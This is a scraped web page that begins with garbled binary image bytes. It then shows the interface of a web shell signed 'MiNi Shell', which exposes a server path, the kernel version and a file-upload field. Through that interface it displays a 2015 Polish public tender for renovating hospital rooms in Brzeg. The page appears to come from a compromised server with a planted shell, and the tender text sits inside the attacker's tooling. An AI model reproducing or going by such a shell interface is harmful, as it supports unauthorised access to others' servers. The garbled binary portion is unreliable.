JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150109/5640-N-2015.html

<p class="kh_header"><b>Brzeg: Przebudowa pomieszczeń szpitalnych z adaptacją  na pomieszczenia pracowni endoskopowej oraz poradni kardiologicznej na 1 piętrze w budynku B2 w Brzeskim Centrum Medycznym w Brzegu przy ul. Mossora 1</b><br>
<b>Numer ogłoszenia: 5640 - 2015; data zamieszczenia: 09.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Brzeskie Centrum Medyczne , ul. Mossora 1, 49-301 Brzeg, woj. opolskie, tel. 077 4446521, faks 077 4446522.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa pomieszczeń szpitalnych z adaptacją  na pomieszczenia pracowni endoskopowej oraz poradni kardiologicznej na 1 piętrze w budynku B2 w Brzeskim Centrum Medycznym w Brzegu przy ul. Mossora 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pomieszczenia szpitalne objęte niniejsza dokumentacja zlokalizowane są  na 1 piętrze w kompleksie budynków BCM - blok B2  przy ul. Mossora 1 w Brzegu. 
Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie niezbędnym do rozpoczęcia użytkowania przedmiotowych pomieszczeń szpitalnych zgodnie z przeznaczeniem wynikającym z opracowanej dokumentacji projektowej. W ramach realizacji przedmiotu zamówienia należy wykonać roboty rozbiórkowe, roboty budowlane, prace wykończeniowe jak również prace branży sanitarnej oraz branży elektrycznej umożliwiające docelowe wyposażenie i umeblowanie pracowni endoskopowej i poradni kardiologicznej. Zakres prac objętych zamówieniem:
1.Roboty branży budowlanej:1.1 roboty rozbiórkowe: wykucie z muru ościeżnic drewnianych, rozebranie ścianek z cegieł, zerwanie posadzki z tworzyw sztucznych, rozebranie posadzek z deszczułek z oderwanie listew lub cokołów, rozebranie wykładziny ściennej z płytek, wykucie z muru ościeżnic drzwi aluminiowych, załadunek gruzu, opłata za wywóz gruzu;1.2 roboty budowlane: naprawa posadzki cementowej, gruntowanie podłoży pod wylewkę samopoziomującą, warstwy wyrównujące i wygładzające z zaprawy samopoziomującej, szlifowanie powierzchni poziomych wylewek samopoziomujących, gruntowanie podłoży poziomych, posadzki z wykładzin  z tworzyw sztucznych, uszczelnienie pomieszczeń mokrych i wilgotnych pod okładzinę ceramiczną, posadzki z płytek, uzupełnienie ścianek z cegieł, ścianki działkowe z płyt g - k na profilach aluminiowych, obmurowanie pionów instalacyjnych cegłami, zamurowanie bruzd pionowych lub pochyłych w ścianach z cegieł, wzmocnienie ścianki z płyt g - k, tynki wewnętrzne zwykle na ścianach, sufity podwieszane z płyt g - k na metalowej konstrukcji nośnej, uszczelnienie pomieszczeń mokrych i wilgotnych płynną folią, licowanie ścian płytkami, zeskrobanie i zmycie starej farby, gruntowanie podłoży pod szpachlowanie, wewnętrzne gładzie gipsowe dwuwarstwowe, gruntowanie podłoży pod malowanie, dwukrotne malowanie farbami emulsyjnymi akrylowymi i lateksowymi, dwukrotne malowanie farbą olejna stolarki drzwiowej, szlifowanie parapetów lastrykowych, naprawa tynków na ościeżach po demontażu i ponownym montażu drzwi aluminiowych, montaż ościeżnic stalowych, montaż skrzydeł drzwiowych wewnętrznych, montaż drzwi aluminiowych dwuskrzydłowych o odporności EI60,2.Roboty branży sanitarnej: wykonanie instalacji gazów medycznych wraz z montażem niezbędnych urządzeń, robotami budowlanymi, usunięciem powstałego gruzu, wykonanie prób szczelności  i prac kontrolnych (dwukrotne), wykonanie instalacji wentylacji (montaż kanałów wentylacyjnych z armaturą regulacyjną i nawiewno - wywiewną, wykonanie zabezpieczeń termicznych i akustycznych kanałów wentylacyjnych, montaż urządzeń wentylacji mechanicznej: wentylator kanałowy z płynną regulacją L O 160 i L O 100, montaż centrali wentylacyjnych z uruchomieniem i regulacją, montaż centrali klimatyzacyjnej NW1 z automatyka, okablowaniem i uruchomieniem, wygłuszenie centrali wentylacyjnej, montaż konstrukcji wsporczej w systemie wsporników ramowych modułowych, montaż wspornika modułowego ramowego), wykonanie instalacji wodno - kanalizacyjnej ( wykucie, zamurowanie i otynkowanie bruzd w ścianie, usunięcie gruzu z budynku, wywóz gruzu, demontaż rurociągu stalowego, demontaż baterii umywalkowych, demontaż baterii bidetowej, montaż rurociągów i armatury odcinającej, wykonanie płukania instalacji wodnej oraz próby szczelności, wykonanie izolacji termicznej rurociągów, montaż armatury czerpalnej - baterii umywalkowych, baterii zlewozmywakowej, baterii bidetowej, zaworu czerpalnego, mieszaczy wody z zaworami termostatycznymi), wykonanie kanalizacji sanitarnej (wykucie zamurowanie i otynkowanie bruzd w ścianie, usunięcie gruzu z budynku, wywóz gruzu, demontaż rurociągu stalowego, demontaż umywalek porcelanowych, demontaż ustępu z miska porcelanową, demontaż bidetu porcelanowego, montaż rurociągów, osprzętu i elementów montażowych do armatury tj.: wstawienie trójników z PCW, montaż rurociągów kanalizacyjnych z PVC, montaż drzwiczek rewizyjnych  do zaworów, montaż armatury sanitarnej - elementów montażowych do zabudowy bidetu i miski ustępowej wiszącej, bidetu wiszącego, umywalki, półnogi porcelanowych do umywalek, miski ustępowej wiszącej, przycisku do spłuczek podtynkowych), wykonanie klimatyzacji (montaż zewnętrznego agregatu skraplającego 12,5 kW z modułem do współpracy z centrala PAC-IF012B-E, wykonanie rurociągów miedzianych, wykonanie izolacji rur z otuliny kauczukowej, przedmuchanie sprężonym powietrzem instalacji chłodniczej, wykonanie próby szczelności, uruchomienie instalacji chłodniczej, montaż konstrukcji wsporczej oraz wspornika modułowego ramowego).3.Roboty branży elektrycznej: zasilanie (mechaniczne wykucie bruzd dla przewodów wtynkowych, ułożenie przewodów kabelkowych o przekroju żył do 30 mm2 , zaprawienie bruzd, badanie linii kablowej o ilości żył do 4), rozdzielnica (przygotowanie podłoża do zabudowania aparatów o 3-4 otworach mocujących, montaż rozdzielnicy skrzynkowej o masie do 50 kg wraz z konstrukcją), instalacja oświetleniowa (przygotowanie podłoża pod oprawy oświetleniowe, wykonanie otworów pod osprzęt i aparaty elektryczne w ścianach z płyt g - k, montaż opraw oświetleniowych w sufitach podwieszanych, montaż na gotowym podłożu opraw świetlówkowych z blachy stalowej z rastrem, przygotowanie podłoża pod mocowanie osprzętu na zaprawie cementowej lub gipsowej z wykonaniem ślepych otworów mechanicznie w cegle, montaż na gotowym podłożu puszek o średnicy do 60 mm i do 80 mm, montaż na gotowym podłożu łączników instalacyjnych podtynkowych jednobiegunowych, montaż na gotowym podłożu łączników instalacyjnych podtynkowych świecznikowych, mechaniczne wykucie bruzd dla przewodów wtynkowych w cegle, ułożenie przewodów kabelkowych o łącznym przekroju żył do 7,5 mm2 w gotowych korytkach i na drabinkach bez mocowania, zaprawienie bruzd o szer. do 50 mm, sprawdzenie i pomiar kompletnego 1-fazowego odwodu elektrycznego nn, pomiary szybkiego wyłączenia - pierwszy i następny), instalacja siłowa i gniazd wtykowych (mechaniczne wykucie bruzd dla przewodów wtynkowych w cegle, ułożenie przewodów kabelkowych o przekroju żył do 12,5 mm2 w gotowych bruzdach na podłożu innym niż beton, ułożenie przewodów kabelkowych o przekroju żył do 7,5 mm2 w gotowych bruzdach na podłożu innym niż beton, zaprawienie bruzd o szer. do 50 mm, przygotowanie podłoża pod mocowanie osprzętu na zaprawie cementowej lub gipsowej z wykonaniem ślepych otworów mechanicznie w cegle, montaż na gotowym podłożu puszek o średnicy do 60 mm i do 80 mm, montaż na gotowym podłożu puszek 85x105 z tworzyw sztucznych z wymiennymi wylotami mocowanych bezśrubowo, montaż na gotowym podłożu łączników instalacyjnych podtynkowych jednobiegunowych, montaż do gotowego podłoża gniazd wtyczkowych podtynkowych 2 - biegunowych z uziemieniem 10A/2,5 mm2 przelotowych podwójnych, montaż do gotowego podłoża gniazd wtyczkowych bryzgoszczelnych 3 - biegunowych z uziemieniem przykręcanych 16A/2,5 mm2 , podłączenie silników w obudowie - kable 3 - żyłowe Cu do 6 mm2, sprawdzenie i pomiar kompletnego 1 - fazowego obwodu elektrycznego nn, sprawdzenie i pomiar kompletnego 2,3 - fazowego obwodu elektrycznego nn, pomiary szybkiego wyłączenia - pierwszy i następny), podłączenie klap dymowych (mechaniczne wykucie bruzd dla przewodów wtynkowych w cegle, ułożenie przewodów kabelkowych o przekroju żył do 7,5 mm2 w gotowych bruzdach na podłożu innym niż beton, zaprawienie bruzd o szer. do 50 mm, podłączenie przewodów kabelkowych pod zaciski lub bolce, przekrój żył do 2,5 mm2, sprawdzenie brzęczykiem przewodów, instalacja sieci strukturalnej i telefonicznej (przygotowanie podłoża pod mocowanie osprzętu na zaprawie cementowej lub gipsowej z wykonaniem ślepych otworów mechanicznie w cegle, montaż na gotowym podłożu puszek o średnicy do 80 mm, mechaniczne wykucie bruzd dla przewodów wtynkowych w cegle, ułożenie przewodów kabelkowych o przekroju żył do 7,5 mm2 w gotowych bruzdach na podłożu innym niż beton, zaprawienie bruzd o szer. do 50 mm, ułożenie przewodów kabelkowych o łącznym przekroju żył do 7,5 mm2 w gotowych korytkach i na drabinkach bez mocowania, sprawdzenie brzęczykiem przewodów, Instalacja czujek ppoż. (montaż gniazd pożarowych z izolatorem zwarć do samoczynnych ostrzegawczy pożarowych - czujek, montaż czujek pożarowych - izotopowa lub optyczna dymu,  mechaniczne wykucie bruzd dla przewodów wtynkowych w cegle, ułożenie przewodów kabelkowych o przekroju żył do 7,5 mm2 w gotowych bruzdach na podłożu innym niż beton, zaprawienie bruzd o szer. do 50 mm)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0, 45.40.00.00-1, 45.30.00.00-0, 45.32.00.00-6, 45.32.10.00-3, 45.33.00.00-9, 45.33.20.00-3, 45.33.22.00-5, 45.33.24.00-7, 45.34.30.00-3, 45.00.00.00-7, 45.31.00.00-3, 45.31.11.00-1, 45.31.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 80.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający ustala się wadium w wysokości  3 100,00 zł, słownie : trzy tysiące sto , 00/100 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę, zgodnie z treścią załącznika nr 6 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga się potwierdzenia poprzez przedłożenie wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę, zgodnie z treścią załącznika nr 6 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę, zgodnie z treścią załącznika nr 6 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę, zgodnie z treścią załącznika nr 6 do SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych - załącznik nr 6 do SIWZ. 2.Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zgodnie z art. 144 ustawy Prawo Zamówień Publicznych przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, tj. dopuszcza się zmiany w zakresie: a) zmiany danych związanych z obsługą administracyjno-organizacyjną umowy, zmiany danych teleadresowych oraz osób wskazanych do kontaktów między Stronami, zmiany podwykonawców b) zmiany stawki podatku VAT na skutek zmian w przepisach prawnych, urzędowa zmiana podatku VAT w takim przypadku cena netto pozostanie bez zmian, zaś odpowiedniej zmianie ulegnie cena brutto. c) konieczności zmiany w przedmiocie zamówienia w szczególności zmiany wynikającej ze zmian w  projekcie lub specyfikacji technicznej wykonania i odbioru robót o ile zmiana ta nie powoduje zmiany wynagrodzenia Wykonawcy,1.1 Przedłużenia terminu wykonania umowy, w przypadku: a)wystąpienia konieczności wykonania robót dodatkowych, których zakres i termin realizacji ma wpływ na termin wykonania niniejszej umowy, b)wystąpienia zmiany w dokumentacji projektowej dokonanej na wniosek Wykonawcy lub Zamawiającego, konieczności usunięcia błędów w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, o ile nie powoduje to zwiększenia wynagrodzenia Wykonawcy, c) wystąpienia siły wyższej, rozumianej jako zdarzenie pochodzące z zewnątrz, którego następstwa nie można było przewidzieć i którego następstwom nie można było zapobiec mimo dołożenia największej staranności, tj. sytuacje takie jak stan wojny, klęski żywiołowe, nowe regulacje prawne, akty prawne władz lub orzeczenia sądowe opóźniające terminowość wykonania umowy oraz wszelkie inne wyjątkowe przyczyny pozostające poza racjonalną kontrolą strony, która się na nie powołuje umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bcmbrzeg.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Brzeskie Centrum Medyczne Dział Zamówień Publicznych i Realizacji Dostaw Brzeskiego Centrum Medycznego w Brzegu przy ul. Mossora 1, 49-301 Brzeg..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2015 godzina 10:00, miejsce: Sekretariat Brzeskiego Centrum Medycznego w Brzegu przy ul. Mossora 1, 49-301 Brzeg.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com